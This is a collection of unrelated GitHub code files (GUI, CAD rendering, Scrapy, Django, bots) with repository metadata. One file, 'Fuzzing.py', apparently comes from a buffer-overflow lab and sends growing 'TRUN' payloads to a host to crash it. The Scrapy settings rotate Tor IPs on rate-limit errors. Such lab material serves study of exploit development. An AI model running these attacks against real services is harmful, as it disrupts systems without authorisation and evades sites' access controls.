main_canvas.place(x=215, y=15)\n global splash_screen\n splash_screen = resize_image(\"population_analyser.png\", 766, 560)\n main_canvas.create_image(0, 0, anchor=tk.NW, image=splash_screen)\n return main_canvas\n\n def create_console_canvas():\n global status_line_canvas\n status_line_canvas = tk.Canvas(main_window, width=950, height=110, bg=\"#cccccc\")\n status_line_canvas.place(x=215, y=580)\n return status_line_canvas\n\n def update_status_line(string):\n global status_line_canvas\n status_line_canvas.delete(\"all\")\n divided_string = textwrap.fill(string, width=100)\n status_line_canvas.create_text(10, 10, anchor=\"nw\", text=divided_string, font=(\"Tahoma\", 11))\n\n create_statistics_combo_box()\n 
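# Note (added): the statistics combo is built first because it seeds the selected_country\n    # global that the year combo and the button handlers read.\n    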
create_chart_type_combo_box()\n create_text_fields()\n create_checkboxes()\n create_buttons()\n create_labels()\n create_main_canvas()\n create_console_canvas()\n main_window.update()\n main_window.mainloop()\n\n\ndef main():\n create_main_window()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bodyakyryliuk/python-laboratories","sub_path":"lab12/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70609024089","text":"import cv2\nimport ezdxf\nimport numpy as np\n\n\ndef draw_hatch(img, entity, color, mask):\n for poly_path in entity.paths.paths:\n # print(poly_path.path_type_flags)\n polygon = np.array([vertex[:-1] for vertex in poly_path.vertices]).astype(int)\n if poly_path.path_type_flags & 1 == 1:\n cv2.fillPoly(img, [polygon], color)\n cv2.fillPoly(mask, [polygon], (255, 255, 255))\n else:\n cv2.fillPoly(img, [polygon], (255, 255, 255))\n return color\n\n\ndef draw_line(img, entity, color, mask):\n p1 = entity.dxf.start[:-1]\n p2 = entity.dxf.end[:-1]\n cv2.line(img, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), color, 1)\n cv2.line(mask, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), (255, 255, 255), 2)\n return color\n\n\ndef draw_lwpolyline(img, entity, color, mask):\n polyline = []\n a = np.array(entity.lwpoints.values).astype(int)\n while len(a) > 0:\n polyline.append((a[0], a[1]))\n a = a[5:]\n cv2.polylines(img, [np.array(polyline)], entity.closed, color, 1)\n cv2.polylines(mask, [np.array(polyline)], entity.closed, (255, 255, 255), 2)\n return color\n\n\ndef draw_arc(img, entity, color, mask):\n s = entity.dxf.start_angle * np.pi / 180\n e = entity.dxf.end_angle * np.pi / 180\n if s > e:\n s -= 2 * np.pi\n d = (e - s) / (int((e - s) * 180 / np.pi) + 1)\n r = entity.dxf.radius\n cx, cy = entity.dxf.center.xyz[:-1]\n angles = np.arange(s, e + d / 2, d)\n x = cx + r * np.cos(angles)\n y = cy + r * np.sin(angles)\n points = np.column_stack((x, y)).astype(int)\n cv2.polylines(img, [points], abs(s - e) < 1e-9, color, 1)\n cv2.polylines(mask, [points], abs(s - e) < 1e-9, (255, 255, 255), 2)\n return color\n\n\ndef draw_circle(img, entity, color, mask):\n r = entity.dxf.radius\n cx, cy = entity.dxf.center.xyz[:-1]\n cv2.circle(img, (int(cx), int(cy)), int(r), color, 1)\n cv2.circle(mask, (int(cx), int(cy)), int(r), (255, 255, 255), -1)\n return color\n\n\ndef draw_ellipse(img, entity, color, mask):\n cx, cy = entity.dxf.center.xyz[:-1]\n ma = entity.dxf.major_axis.magnitude\n angle = entity.dxf.major_axis.angle_deg\n mi = ma * entity.dxf.ratio\n s = entity.dxf.start_param * 180 / np.pi\n e = entity.dxf.end_param * 180 / np.pi\n if entity.dxf.extrusion.z == -1:\n s = 360 - s\n e = 360 - e\n cv2.ellipse(img, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, color, 1)\n cv2.ellipse(mask, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, (255, 255, 255), 1)\n return color\n\n\ndef draw_point(img, entity, color, mask):\n cx, cy = entity.dxf.location.xyz[:-1]\n cv2.circle(img, (int(cx), int(cy)), 0, color, 1)\n cv2.circle(mask, (int(cx), int(cy)), 0, (255, 255, 255), -1)\n return color\n\n\ndraw_map = {\n 'HATCH': draw_hatch,\n 'LINE': draw_line,\n 'LWPOLYLINE': draw_lwpolyline,\n 'ARC': draw_arc,\n 'CIRCLE': draw_circle,\n 'ELLIPSE': draw_ellipse,\n 'POINT': draw_point,\n}\n\n\ndef paint(in_path, out_path, config):\n doc = ezdxf.readfile(in_path)\n extmax, extmin = doc.header['$EXTMAX'], doc.header['$EXTMIN']\n xmin, ymin = 
np.floor(extmin[:-1]).astype(int)\n    xmax, ymax = np.ceil(extmax[:-1]).astype(int)\n    img = np.ones((ymax + ymin, xmax + xmin, 3), np.uint8) * 255\n    mask = np.zeros_like(img)\n    msp = doc.modelspace()\n    layers = config.get('layers', {})\n    colors = config.get('colors', {})\n    # print(doc.layers.entries.keys())\n    for layer_name, names in layers.items():\n        color = tuple(colors.get(layer_name, [0, 0, 0]))\n        for name in names:\n            if name not in doc.layers:\n                continue\n            entities = msp.query('*[layer==\"%s\"]' % name)\n            tmp = np.zeros((ymax + ymin, xmax + xmin), np.uint8)\n            for entity in entities:\n                if entity.DXFTYPE in draw_map:\n                    draw_map[entity.DXFTYPE](img, entity, color, tmp)\n                else:\n                    print(\"%s: %s\" % (name, entity.DXFTYPE))\n            contours, hierarchy = cv2.findContours(tmp, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n            cv2.drawContours(mask, contours, -1, color, -1)\n\n    res, img_png = cv2.imencode('.png', cv2.flip(img, 0))\n    res, mask_png = cv2.imencode('.png', cv2.flip(mask, 0))\n    with open(out_path, 'wb') as f:\n        f.write(img_png.tobytes())\n    with open(out_path[:-4] + \"_mask.png\", 'wb') as f:\n        f.write(mask_png.tobytes())\n","repo_name":"maik-nack/rooms_painting","sub_path":"painter.py","file_name":"painter.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12832131803","text":"#!/usr/bin/python3\nimport sys\nimport socket\nfrom time import sleep\n\nbuffer = \"A\" * 100\n\nwhile True:\n    try:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.settimeout(10)\n        s.connect(('192.168.0.234', 9999))\n        s.send(('TRUN /.:/' + buffer).encode())\n        s.settimeout(None)\n        s.close()\n        sleep(1)\n        buffer = buffer + (\"A\" * 100)\n    except Exception as ex:\n        print(ex)\n        lengthBuffer = len(buffer)\n        print(\"Fuzzing crashed at {} bytes\".format(lengthBuffer))\n        sys.exit()\n","repo_name":"nedzof/BufferOverflow","sub_path":"Fuzzing.py","file_name":"Fuzzing.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36538442752","text":"# import board\nimport busio\nimport adafruit_ssd1306\n\nfrom PIL import Image, ImageDraw, ImageFont\n\ni2c = busio.I2C(2, 4);\noled = adafruit_ssd1306.SSD1306_I2C(128, 32, i2c, addr=0x3C);\n\n# Clear the display.\noled.fill(0)\noled.show()\n \n# Create blank image for drawing.\n# Make sure to create image with mode '1' for 1-bit color.\nimage = Image.new(\"1\", (oled.width, oled.height))\n \n# Get drawing object to draw on image (it must exist before any text is drawn).\ndraw = ImageDraw.Draw(image)\n \n# Load default font.\nfont = ImageFont.load_default()\n \n# Draw Some Text\ntext = \"Hello World!\"\n(font_width, font_height) = font.getsize(text)\ndraw.text(\n    (oled.width // 2 - font_width // 2, oled.height // 2 - font_height // 2),\n    text,\n    font=font,\n    fill=255,\n)\n\n# Push the image buffer to the display.\noled.image(image)\noled.show()","repo_name":"iceman198/simplefarmbench","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35216571372","text":"import unittest\nfrom envs.tictactoe_env import TicTacToeEnv\nimport numpy as np\n\nclass MyTestCase(unittest.TestCase):\n    def setUp(self):\n        self.env = TicTacToeEnv()\n\n    def test_reset(self):\n        state = self.env.reset()\n        self.assertTrue(np.array_equal(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]), state))\n\n    def test_simple_game(self):\n        e_reward, e_done = 0.0, False\n\n        self.env.reset()\n        
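# Note (added): env.step() returns the (state, reward, done) triple asserted below.\n        state, reward, done = 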
self.env.step(0)\n\n self.assertTrue(np.array_equal(1, state[0]))\n self.assertTrue(reward == self.env.default)\n self.assertEqual(e_done, done)\n\n def test_illegal_move(self):\n e_reward, e_done = 0.0, True\n\n self.env.reset()\n state, reward, done = self.env.step(8)\n\n opponent = np.argmin(state)\n\n state, reward, done = self.env.step(opponent)\n\n self.assertTrue(np.array_equal(1, state[8]))\n self.assertTrue(reward == self.env.illegal)\n self.assertEqual(e_done, done)\n\n def test_draw_or_win_or_loose(self):\n e_reward, e_done = 0.0, True\n\n self.env.reset()\n next_move = 8\n while(True):\n state, reward, done = self.env.step(next_move)\n if not done:\n next_move = np.where(state == 0)[0][0]\n else:\n break\n\n self.assertTrue(np.array_equal(1, state[8]))\n self.assertTrue(reward in [self.env.draw,self.env.win, self.env.lose])\n self.assertEqual(e_done, done)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"cpuheater/tic-tac-toe-deep-rl-lab","sub_path":"tests/tictactoe_env_tests.py","file_name":"tictactoe_env_tests.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"38349106125","text":"# A simple HTTP server\n# The default port is 9000.\n# Usage: ``python3 server.py``\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom json import dumps, loads\n\nfrom models import model\n\nPORT = 9000\n\n\nclass ModelHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n request_body = self.rfile.read(int(self.headers[\"Content-Length\"]))\n request_body = request_body.decode()\n request_body = loads(request_body)\n\n prompt = request_body[\"text\"]\n\n model_output = model(prompt)\n response_body = {\"keywords\": model_output}\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write(dumps(response_body).encode())\n\n\nwith HTTPServer((\"\", PORT), ModelHandler) as httpd:\n print(\"Serving at port\", PORT)\n httpd.serve_forever()\n\n","repo_name":"hajin-kim/finding-emo-model-server-template","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9715871704","text":"from django.test import TestCase\nfrom django.urls import reverse\n\nfrom contact.models import Contact\n\nclass ContactAppTests(TestCase):\n def test_contact_form_submission(self):\n # Create a test contact form data\n form_data = {\n 'name': 'John Doe',\n 'email': 'johndoe@example.com',\n 'message': 'Test message',\n }\n\n # Submit the contact form\n response = self.client.post(reverse('contact'), form_data)\n\n # Check that the form submission was successful\n self.assertEqual(response.status_code, 302) # Redirect response\n self.assertRedirects(response, reverse('contact'))\n\n # Check that the contact object was created in the database\n self.assertEqual(Contact.objects.count(), 1)\n contact = Contact.objects.first()\n self.assertEqual(contact.name, form_data['name'])\n self.assertEqual(contact.email, form_data['email'])\n self.assertEqual(contact.message, form_data['message'])\n","repo_name":"pouyanze/portfolio","sub_path":"contact/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13494312955","text":"import math \nimport argparse\nimport numpy as 
np\nimport pandas as pd\n\ndef read_pdb(fichier_pdb):\n    \"\"\"Read a PDB file\n    Extracts the coordinates of all the atoms of the protein into a pandas data frame and returns it.\"\"\"\n    with open(fichier_pdb,\"r\") as pdb_file:\n        liste_principale=[]\n        for line in pdb_file:\n            if line.startswith(\"ATOM\") or line.startswith(\"HETATM\"): \n                sous_liste=[]\n                sous_liste.append(line[0:6])\n                sous_liste.append(int(line[6:11]))\n                sous_liste.append(line[12:16].strip())\n                sous_liste.append(line[16:17])\n                sous_liste.append(line[17:20].strip())\n                sous_liste.append(line[21:22])\n                sous_liste.append(int(line[22:26]))\n                sous_liste.append(line[26:27])\n                sous_liste.append(float(line[30:38]))\n                sous_liste.append(float(line[38:46]))\n                sous_liste.append(float(line[46:54]))\n                sous_liste.append(float(line[54:60]))\n                sous_liste.append(float(line[60:66]))\n                sous_liste.append(line[76:78])\n                sous_liste.append(line[78:80])\n                liste_principale.append(sous_liste)\n    \n    df= pd.DataFrame(liste_principale, columns = ['ATOM','atom_number','atom_name','location_indicator','residue_name',\\\n                                                  'chain_identifier','residue_number','code','X','Y','Z',\\\n                                                  'occupancy','temperature','symbol','charge'])\n    return df\n\n\n\ndef write_pdb(df,nouveau_pdb):\n    \"\"\" Write a PDB file \n    Takes the name of the new .pdb file and the pandas data frame in the same format as the one defined \n    above, and saves it in PDB format.\"\"\"\n    with open(nouveau_pdb,\"wt\") as inputfile:\n        for i in range(len(df)):\n            inputfile.write(\"{:6s}{:5d} {:^4s}{:1s}{:3s} {:1s}{:4d}{:1s}   {:8.3f}{:8.3f}{:8.3f}{:6.2f}{:6.2f}          {:>2s}{:2s}\\n\".format(df.iloc[i,0],df.iloc[i,1],df.iloc[i,2],\\\n            df.iloc[i,3],df.iloc[i,4],df.iloc[i,5],df.iloc[i,6],df.iloc[i,7],\\\n            df.iloc[i,8],df.iloc[i,9],df.iloc[i,10],df.iloc[i,11],\\\n            df.iloc[i,12],df.iloc[i,13],df.iloc[i,14]))\n        inputfile.write(\"TER\")\n    return inputfile\n\ndef select_atoms(df,selector):\n    \"\"\" Atom selection \n    Takes the pandas data frame and a selector as input and returns the filtered data frame \"\"\"\n    data = df\n    # Apply each selection criterion in turn, narrowing the data frame each time\n    for sele in selector: \n        data = data.loc[data[sele].isin(selector[sele])]\n    return data\n    \n#def get_aa_seq(df):\n\n\ndef compute_distance(d1,d2):\n    '''Computes the distance between two atoms '''\n    a = d1\n    b= d2\n    somme = 0 \n    for row in ['X','Y','Z']:\n        somme = somme + (b[row]-a[row])**2\n    distance = math.sqrt(somme)\n    return distance \n\n#def find_salt_bridges : \n\n#def contact_map():\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AnissaMdahoma/Projet_python","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36249450669","text":"import logging\nfrom utils.helpers import LoggerFilter\nfrom scrapy.utils.log import configure_logging \n\n\n\"\"\" General spider/bot settings \"\"\"\nCLOSESPIDER_ITEMCOUNT = 0 # Default: 0\nCLOSESPIDER_TIMEOUT = 0 # Default: 0 [sec]\nCLOSESPIDER_PAGECOUNT = 0 # Default: 0\nBOT_NAME = \"slangdictionary\"\nSPIDER_MODULES = [\"slangdictionary.spiders\"]\nNEWSPIDER_MODULE = \"slangdictionary.spiders\"\nALLOWED_DOMAINS = ['onlineslangdictionary.com'] \nSTART_URLS = ['http://onlineslangdictionary.com/word-list/0-a/']\nCUSTOM_SPIDER_SETTINGS = {'JOBDIR': './crawls'}\nROBOTSTXT_OBEY = False\n\n\"\"\" Configure a delay for requests for the same website \"\"\"\nRANDOMIZE_DOWNLOAD_DELAY = True \nDOWNLOAD_DELAY = 0.1 # Time [sec] to wait before downloading consecutive pages from the same 
website.\nDOWNLOAD_TIMEOUT = 30 # Time [sec] that the downloader will wait before timing out.\nCONCURRENT_REQUESTS_PER_DOMAIN = 16 # maximum number of concurrent requests performed to a single domain.\n\n\n\"\"\" Item pipeline configuration\"\"\"\nITEM_PIPELINES = {\n \"slangdictionary.pipelines.DefaultValuesPipeline\": 300,\n \"slangdictionary.pipelines.SavePipeline\": 310,\n}\n\n\"\"\" Spider middleware configuration \"\"\"\nSPIDER_MIDDLEWARES = {\n 'scrapy.spidermiddlewares.referer.RefererMiddleware': 10,\n}\n\n\"\"\" Downloader middleware configuration \"\"\"\nDOWNLOADER_MIDDLEWARES = {\n 'utils.middlewares.IPSwitchMiddleware': 450,\n 'utils.middlewares.HeadersMiddleware': 650,\n 'utils.middlewares.URLLoggerMiddleware': 950\n}\n\n# Retrying failed requests\nRETRY_ENABLED = True\nRETRY_TIMES = 5\nRETRY_HTTP_CODES = [400, 500, 502, 503, 504, 522, 524, 408, 429]\n\n# Tor handler \nTOR_ENABLED = True\nIP_CHANGE_CODES = RETRY_HTTP_CODES\nIP_SETTLE_TIME = 2 # Wait time for the new IP to \"settle in\"\n\n# Header generator - see random_header_generator package\nREFERER_ENABLED = True\nHEADER_GENERATOR_ENABLED = True\nREFERRER_POLICY = 'same-origin'\nHEADER_DEVICE_TYPE = 'desktop' \nHEADER_BROWSER_NAME = None\nHEADER_HTTP_VERSION = 1\nUSER_AGENTS = 'program'\n\n# URL Logger\nURL_LOG_ENABLED = True\nURL_LOG_DB = \"./url_logger.db\"\n\n\"\"\" Extensions configuration \"\"\"\nEXTENSIONS = {'utils.extensions.ProgressMonitor': 0}\nPROGRESS_MONITOR_ENABLED = True\nPROGRESS_MONITOR_STEP = 10\n\n\n\"\"\" Database-related settings \"\"\"\nDB = \"./slang_dict.db\"\n\nDB_PRAGMA = \"\"\"\n PRAGMA foreign_keys=OFF;\n PRAGMA journal_mode=WAL;\n PRAGMA synchronous=FULL;\n \"\"\"\n\nDB_SCHEMA = \"\"\"\n CREATE TABLE IF NOT EXISTS items (\n id INTEGER PRIMARY KEY,\n word TEXT NOT NULL,\n definition TEXT NOT NULL,\n users_used INTEGER,\n users_not_used INTEGER,\n users_heard INTEGER,\n users_not_heard INTEGER,\n vulgarity INTEGER\n ) STRICT; \n\"\"\"\n\n\"\"\" Logger configuration \"\"\"\nLOG_FILE = './logger.log'\nLOG_FORMAT = '%(levelname)s: %(message)s'\nLOG_LEVEL = logging.ERROR\nconfigure_logging(settings = {\"LOG_FILE\": LOG_FILE, \"LOG_FORMAT\": LOG_FORMAT, \"LOG_LEVEL\": LOG_LEVEL})\nlogging.getLogger('scrapy.core.scraper').addFilter(LoggerFilter())\n\n# Set settings whose default value is deprecated to a future-proof value\nREQUEST_FINGERPRINTER_IMPLEMENTATION = \"2.7\"\nTWISTED_REACTOR = \"twisted.internet.asyncioreactor.AsyncioSelectorReactor\"\nFEED_EXPORT_ENCODING = \"utf-8\"\n","repo_name":"Miltos-90/scrapy_examples","sub_path":"slangdictionary/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13044483259","text":"import logging\nimport utils.utils as utils\nfrom lib.scheduler import scheduler\nfrom lib.reddit import subreddit, get_latest_snapshot, process_comment\n\ndef main():\n # Start scheduler to update snapshot csv post data\n logging.info(\"Starting scheduler\")\n scheduler.start()\n \n # Get latest snapshot\n get_latest_snapshot()\n\n for comment in subreddit.stream.comments(skip_existing=True):\n try:\n process_comment(comment)\n except Exception as e:\n logging.error(f\"Failed to process comment: {e}\", exc_info=True)\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO, \n format='%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n logging.getLogger(\"apscheduler\").setLevel(logging.DEBUG)\n 
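# Note (added): main() blocks on the comment stream; the scheduler started inside it\n    # keeps refreshing the snapshot data in the background.\n    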
main()\n","repo_name":"mmackz/moonbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42735035289","text":"import os\nimport fnmatch\nimport re\nfrom texts.storage import Storage\n\ns = Storage(r'F:\\Yandex\\Sites\\jewTeX\\TEXTS_DB')\nresult = []\nfor root, dir, files in os.walk(r\"F:\\Yandex\\Sites\\jewTeX\\TEXTS_DB\"):\n # print(root)\n if not '.git' in root:\n # for items in fnmatch.filter(files, \"*\"):\n for items in files:\n filepath = os.path.join(root, items)\n with open(filepath,'r',encoding = 'utf8') as fin:\n text = fin.read()\n for subtext in re.findall('\\?\\?(.+?)\\?\\?', text):\n result.append([filepath, subtext])\n # result.append([filepath.replace(s.texts_path,'').split(os.path.sep)[1:], subtext])\n\nfor k in result:\n print(k)","repo_name":"Ishayahu/jewTeX","sub_path":"test/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1975224717","text":"import os, sys, requests, time, asyncio\nfrom twitchio.ext import commands\nfrom pubnub.callbacks import SubscribeCallback\nfrom pubnub.enums import PNStatusCategory\nfrom pubnub.pnconfiguration import PNConfiguration, PNReconnectionPolicy\nfrom pubnub.pubnub_asyncio import PubNubAsyncio\n\n# Based on https://dev.to/ninjabunny9000/let-s-make-a-twitch-bot-with-python-2nd8\n# Using https://github.com/TwitchIO/TwitchIO/blob/master/twitchio/\n\n\nclass Bot(commands.Bot):\n def __init__(self, irc_token, client_id, nick, prefix, initial_channels):\n super().__init__(\n token=os.environ['TMI_TOKEN'],\n client_id=os.environ['CLIENT_ID'],\n nick=os.environ['BOT_NICK'],\n prefix=os.environ['BOT_PREFIX'],\n initial_channels=initial_channels\n )\n\n async def event_ready(self):\n print(f'Logged in as | {self.nick}')\n\n\n async def event_message(self, ctx):\n '''Runs every time a message is sent in chat'''\n if ctx.author.name.lower() in [\"streamelements\", \"nightbot\", \"moobot\", os.environ['BOT_NICK'].lower()]:\n return\n\n text = ctx.content.lower()\n if 'pog' in text:\n # Clean up text and form list of keywords\n # e.g. from \"Man! That... is... POGGERSSS!!\" -> [\"man\", \"that\", \"is\", \"poggersss\"]\n replace_chars = \"\\\\`*_{}[](),>#+-.!?$\"\n for c in replace_chars:\n if c in text:\n text = text.replace(c, \"\")\n keywords = text.split(\" \")\n\n # Form an ordered list of deduplicated tokens (duplicate letters get removed)\n # e.g. from [\"man\", \"that\", \"is\", \"poggersss\"] -> [\"man\", \"tha\", \"is\", \"pogers\"]\n deduped = [\n ''.join(list(dict.fromkeys(list(keyword)).keys()))\n for keyword in keywords\n ]\n\n # Form a list of tokens that match one of the valid keywords\n # e.g. 
[\"man\", \"tha\", \"is\", \"pogers\"] will match on the last one, and we return the value (poggers)\n pogs = list(\n set(\n [VALID_POGS[k]\n for k in deduped if k in list(VALID_POGS.keys())]\n )\n )\n\n # For each unique instance of a matched keyword, post them to the API\n if len(pogs) > 0:\n user = ctx.author.display_name\n print(pogs[0] + \" from \" + user + \" in \" + str(ctx.channel))\n try:\n for pog in pogs:\n requests.post(\n api_base + 'pogs', json={\"channel\": str(ctx.channel), \"type\": pog, \"user\": ctx.author.display_name})\n except Exception as ex:\n print(ex)\n\n\nasync def pubnub_handler():\n class message_callback(SubscribeCallback):\n def presence(self, pubnub, presence):\n pass # handle incoming presence data\n\n def status(self, pubnub, status):\n if status.category == PNStatusCategory.PNUnexpectedDisconnectCategory:\n print(\"pubnub lost connection\")\n pass\n\n elif status.category == PNStatusCategory.PNConnectedCategory:\n print(\"connected to pubnub\")\n\n elif status.category == PNStatusCategory.PNReconnectedCategory:\n print(\"reconnected to pubnub\")\n pass\n\n elif status.category == PNStatusCategory.PNDecryptionErrorCategory:\n print(\"pubnub decryption error\")\n pass\n\n def message(self, pubnub, message):\n if message.message[\"cmd\"] == \"join\":\n print(\"Joining \" + message.message[\"value\"])\n loop.create_task(bot.join_channels([message.message[\"value\"]]))\n elif message.message[\"cmd\"] == \"part\":\n print(\"Leaving \" + message.message[\"value\"])\n loop.create_task(bot.part_channels([message.message[\"value\"]]))\n else:\n print(\"[Unknown PN Message]\", message.message)\n\n pubnub.add_listener(message_callback())\n pubnub.subscribe().channels(pubnub_channel).execute()\n\n\n# List of valid (de-duped) keywords to their correct words (e.g. 
poggerssss -> pogers maps to poggers)\nVALID_POGS = {\n    'pogcham': 'pogchamp',\n    'pogu': 'pogu',\n    'poger': 'poggers',\n    'pogers': 'poggers',\n    'pogerz': 'poggers',\n    'pog': 'pog'\n}\n\n\n# API Configuration\napi_base = os.environ['API_BASE']\n\n\n# Get initial channels to join (if API call fails, use those defined in .env)\ninitial_channels = os.environ['TWITCH_CHANNELS'].split(',')\ntry:\n    response = requests.get(url=api_base + 'channels/active')\nexcept Exception as ex:\n    print(ex)\nelse:\n    if response.status_code == 200:\n        initial_channels = response.json()[\"items\"]\n    else:\n        print(\"API returned \" + str(response.status_code) +\n              \" when trying to retrieve active channels!\")\nprint(\"I will connect to these Twitch channels:\", initial_channels)\n\n\n# Twitch bot configuration\nbot = Bot(\n    irc_token=os.environ['TMI_TOKEN'],\n    client_id=os.environ['CLIENT_ID'],\n    nick=os.environ['BOT_NICK'],\n    prefix=os.environ['BOT_PREFIX'],\n    initial_channels=initial_channels\n)\n\n# PubNub Configuration\npubnub_channel = os.environ['PUBNUB_CHANNEL']\npnconfig = PNConfiguration()\npnconfig.publish_key = os.environ['PUBNUB_PUBLISH_KEY']\npnconfig.subscribe_key = os.environ['PUBNUB_SUBSCRIBE_KEY']\npnconfig.reconnect_policy = PNReconnectionPolicy.LINEAR\npnconfig.uuid = 'megapog-SUB'\npubnub = PubNubAsyncio(pnconfig)\n\n\nif __name__ == \"__main__\":\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(pubnub_handler())\n    loop.run_until_complete(bot.run())\n    loop.run_forever()\n","repo_name":"s00189168/OpenStackMegapog","sub_path":"chatbot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73531820568","text":"from django.db import models\nfrom django.urls import reverse\n# Create your models here.\n\nclass Post(models.Model):\n    title = models.CharField(verbose_name = 'TITLE', max_length = 50)\n    # slug: a set of key words that describe the post, often used as the primary key\n    slug = models.SlugField('SLUG', unique = True, allow_unicode = True, help_text = 'one-word alias for the title')\n    description = models.CharField('DESCRIPTION', max_length = 100, blank = True, help_text = 'simple description text')\n    content = models.TextField('CONTENT')\n    create_dt = models.DateTimeField('CREATE DATE', auto_now_add=True)\n    modify_dt = models.DateTimeField('MODIFY DATE', auto_now = True)\n\n    class Meta:\n        verbose_name = 'post'\n        verbose_name_plural = 'posts'\n        db_table = 'blog_posts'\n        ordering = ('-modify_dt',)\n\n    def __str__(self):\n        '''\n        Use the title attribute as the string representation of the object\n        '''\n        return self.title\n\n    def get_absolute_url(self):\n        '''\n        Return the url that points to the object this method is defined on\n        '''\n        # reverse: builds the url from a named url pattern\n        return reverse('blog:post_detail', args=(self.slug,))\n\n    def get_previous(self):\n        '''\n        Return the previous post based on the modify_dt column\n        '''\n        return self.get_previous_by_modify_dt()\n\n    def get_next(self):\n        '''\n        Return the next post based on the modify_dt column\n        '''\n        return self.get_next_by_modify_dt()","repo_name":"shiney5213/Study-Programming","sub_path":"Django/pythonWepProgramming/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39160111450","text":"import yaml\nimport sys\nimport os\n\nfield=sys.argv[1]\nfile_name=sys.argv[2]\n\nvalue=''\n\ntry:\n    with open(file_name) as fh:\n        data = yaml.load(fh, Loader=yaml.FullLoader)\n        value = data[field]\nexcept Exception as err:\n    value = \"ERROR: %s\" % 
(str(err))\n\nsys.stdout.write(value)\nsys.stdout.flush()\nsys.exit(0)","repo_name":"bbrown-caltech/capstone-hangout-point","sub_path":"devops-tools/config/misc/yaml_parser.py","file_name":"yaml_parser.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8542146787","text":"# -*- mode: python -*-\na = Analysis(['.\\\\sudoku-cv.py'],\n pathex=['.'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='Sudoku-CV.exe',\n debug=False,\n strip=None,\n upx=True,\n console=True , icon='.\\\\Resources\\\\Icon512.ico')\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='Sudoku-CV')\n","repo_name":"tfeldmann/Sudoku","sub_path":"sudoku-cv-win.spec","file_name":"sudoku-cv-win.spec","file_ext":"spec","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"9323559593","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2010 ZHENG Zhong \r\n#\r\n# Created on 2010-02-08.\r\n# $Id$\r\n#\r\n\r\nfrom django import forms\r\n\r\nfrom friday.common.errors import ProgrammingError, InvalidFormError\r\nfrom friday.apps.groups.models import Group, Member\r\n\r\n\r\nclass GroupForm(forms.Form):\r\n\r\n uid = forms.CharField(max_length=32, required=True)\r\n name = forms.CharField(max_length=128, required=True)\r\n slogan = forms.CharField(max_length=255, required=False)\r\n description = forms.CharField(required=False, widget=forms.Textarea)\r\n website = forms.URLField(required=False)\r\n google_group = forms.CharField(required=False)\r\n\r\n def __init__(self, data=None, instance=None):\r\n self._instance = instance\r\n if instance:\r\n initial = {\r\n \"uid\": instance.uid,\r\n \"name\": instance.name,\r\n \"slogan\": instance.slogan,\r\n \"description\": instance.description,\r\n \"website\": instance.website,\r\n \"google_group\": instance.google_group,\r\n }\r\n else:\r\n initial = 